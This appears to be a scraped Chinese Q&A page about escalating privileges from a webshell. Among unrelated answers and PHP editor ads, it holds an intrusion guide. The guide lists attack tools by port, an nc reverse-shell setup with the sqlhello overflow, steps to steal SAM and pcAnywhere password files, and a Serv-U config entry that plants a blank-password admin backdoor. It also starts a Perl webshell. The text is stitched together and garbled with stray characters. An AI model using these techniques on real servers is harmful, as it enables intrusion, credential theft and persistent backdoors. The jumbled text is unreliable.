❶ webshell怎么提权,aspx php的也行。
sa密码了拆桥,还有各种提权工具了(游御行看运气了,一般补丁没打就可以),goodluck, webshell上自带的就不神哗说了,
❷ php大马是干什么的
大马:指木马病毒;
php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马;
❸ 如何找漏洞,又怎样利用它提权
1. 1433端口入侵 scanport.exe 查有1433的机枝洞告器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 本篇文章结合了许多高手提升权限的技颤誉巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2.C:\WINNT\system32\config\ 进这里下它的SAM,破解用户的密猛明码 用到破解sam密码的软件有LC,SAMinside 3.C:\Documents and Settings\All Users\“开始”菜单\程序\ 看这里能跳转不,我们从这里可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=WekweN|1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 4.c:\winnt\system32\inetsrv\data\ 就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 c:\php, 用phpspy c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f
❹ PHP 环境,不支持asp脚本,怎么提权呢别复制粘帖
交流一下Q在 81 471 969
❺ php提权能控制整个主机吗,如同从本机登陆远程3389主机
2/4分步阅读
远程连接服务器之前首先需要把基本的准备工作做好,比如首先在服务器创建一个新的网站,并把相应的网站内容上传好。
我这里以wdcp linux服务器为例子,如下图所示创建一个新的网站
2/3
通过flashfxp等软件将网站上传至服务器
3/3
进入phpmyadmin,导入sql文件
连接远程数据库
1/4
选择该数据库,然后点击权限,可以看到如下图所示,然后点击下方添加新用户
2/4
然后输入新用户信息:
1、输入用户名
2、主机:选择任意主机,然后输入 %
(开启mysql本身的远程连接,简单说,就是在创建mysql用户时的主机名,使用IP,域名,或%号就可以,"%"代表所有,也就是任何人和机器都可以连接,只要有用户密码,也可以针对IP,域名来做限制)
3、生成密码
4、全局权限:全选
5、最后执行
3/4
通过以上步骤就生成了一个可以远程访问的数据库,然后通过更改网站配置文件,php文件配置路径如下图,选择database.php,然后打开文件
❻ WEBSHELL怎么提权
上传本地提权工具
❼ 昌平北大青鸟分享PHP常用开发工具
PHP是一种开举正放性的语言,这也导致了正滑悔开发环境没有强而权威的支持。这里列举一些比较好的编辑工具,昌平北大青鸟希望能给大家开发PHP程序提供一些帮助。
Dreamweer
从MX开始,DW开始支持PHP+MYSQL的可视化开发,对于初学者确实是比较好的选择,因为如果是一般性开发,几乎是可以不写一行代码也让闷可以写出一个程序,而且都是所见即所得的。
所包含的特征包括,语法加亮、函数补全,形参提示等。
不过DW生成的代码比较复杂,安全性也一般。在手写的方面,方便度一般,在调试环境方面表现差强人意。不太适合于比较复杂一点的编程。但对于初学的人是再好不过了。
ZendDevelopmentEnviorment
和PHP靠得最近的ZEND推出的一款PHP的IDE,ZENDDEVELOPMENTENVIORMENT。最新的版本为2.6,这也是在LINUX下面唯一一个PHP的集成开发调试环境了,当然它也有WINDOWS版本。
和其它的IDE不同,ZDE是用编写的~~这不光意味着多平台性,同样意味着很慢的速度,和比较奇怪一点的使用界面。尤其是它那将近半分钟的启动速度,让人无法忍受!!!!!
ZDE提供的功能是最齐全的,而且可以和ZEND其它的PHP开发工具无缝的结合。成为一套强大的PHP开发环境,而且ZDE的调试环境是建在ZDE自身程序里面的,而不象其它的IDE,是通过PHPDEBUGER来实现的。
❽ PHP开发通常使用什么工具
PHP 能做任何事。PHP 主要是用于服务端的脚本程序,因此您可以用 PHP 来完成任何其它的 CGI 程序能够完成的工作,例如收集表单数据,生成动态网页,或者发送/接收 Cookies。但 PHP 的功能远不局限于此。
PHP 脚本主要用于以下三个领域。
服务端脚本。这是 PHP 最传统,也是最主要的目标领域。开展这项工作您需要具备以下三点:PHP 解析器(CGI 或者服务器模块)、WEB 服务器和 WEB 浏览器。您需要在运行 WEB 服务器时,安装并配置 PHP,然后,可以用 WEB 浏览器来访问 PHP 程序的输出,即浏览服务端的 PHP 页面。请查阅“安装”一章以获取更多信息。
命令行脚本。您可以编写一段 PHP 脚本,并且不需要任何服务器或者浏览器来运行它。通过这种方式,您仅仅只需要 PHP 解析器来执行。这种用法对于依赖 cron(Unix 或者 Linux 环境)或者 Task Scheler(Windows 环境)的日常运行的脚本来说是理想的选择。这些脚本也可以用来处理简单的文本。请参阅“PHP 的命令行模式”以获取更多信息。
编写客户端的 GUI 应用程序。对于基于窗口式的应用程序来说,PHP 或许不是一种最好的语言,但是如果您非常精通 PHP,并且希望在您的客户端应用程序中使用 PHP 的一些高级特性,您可以利用 PHP-GTK 来编写这些程序。用这种方法,您还可以编写跨平台的应用程序。PHP-GTK 是 PHP 的一个扩展,在通常发布的 PHP 包中并不包含它。如果您对 PHP-GTK 感兴趣,请访问其网站以获取更多信息。
❾ PHP开发通常使用什么工具
AdobeDreamweaver、EditPlus、ZendStudio都是很好的工具。轻量级用EditPlus,偏重前端设计用Dreamweaver,偏重程序开发用ZendStudio吧!
集成开发环境是一种集成了软件开发过程中所需主要工具的集成开发环境,其功能包括但不仅限于代码高亮、代码补全、调试、构建、版本控制等。一些常见的PHPIDEs如下:
ZendStudio:商业版,Zend官方出品,基于eclipse
EclipsewithPDT:免费
Coda:商业版,针对Mac用户
NetBeans:免费,功能强大
PHPStorm:商业版
AptanaStudio:免费
PhpEd:商业版
KomodoIDE/Edit:IDE为商业版,Edit可免费使用
AdobeDreamweaver:商业版
除去集成开发环境,具备代码高亮功能的常见文本编辑器因其轻巧灵活也常被选作开发工具,例如:Notepad++、Editplus、SublimeText、Everedit(国人开发)等等。(来自网络)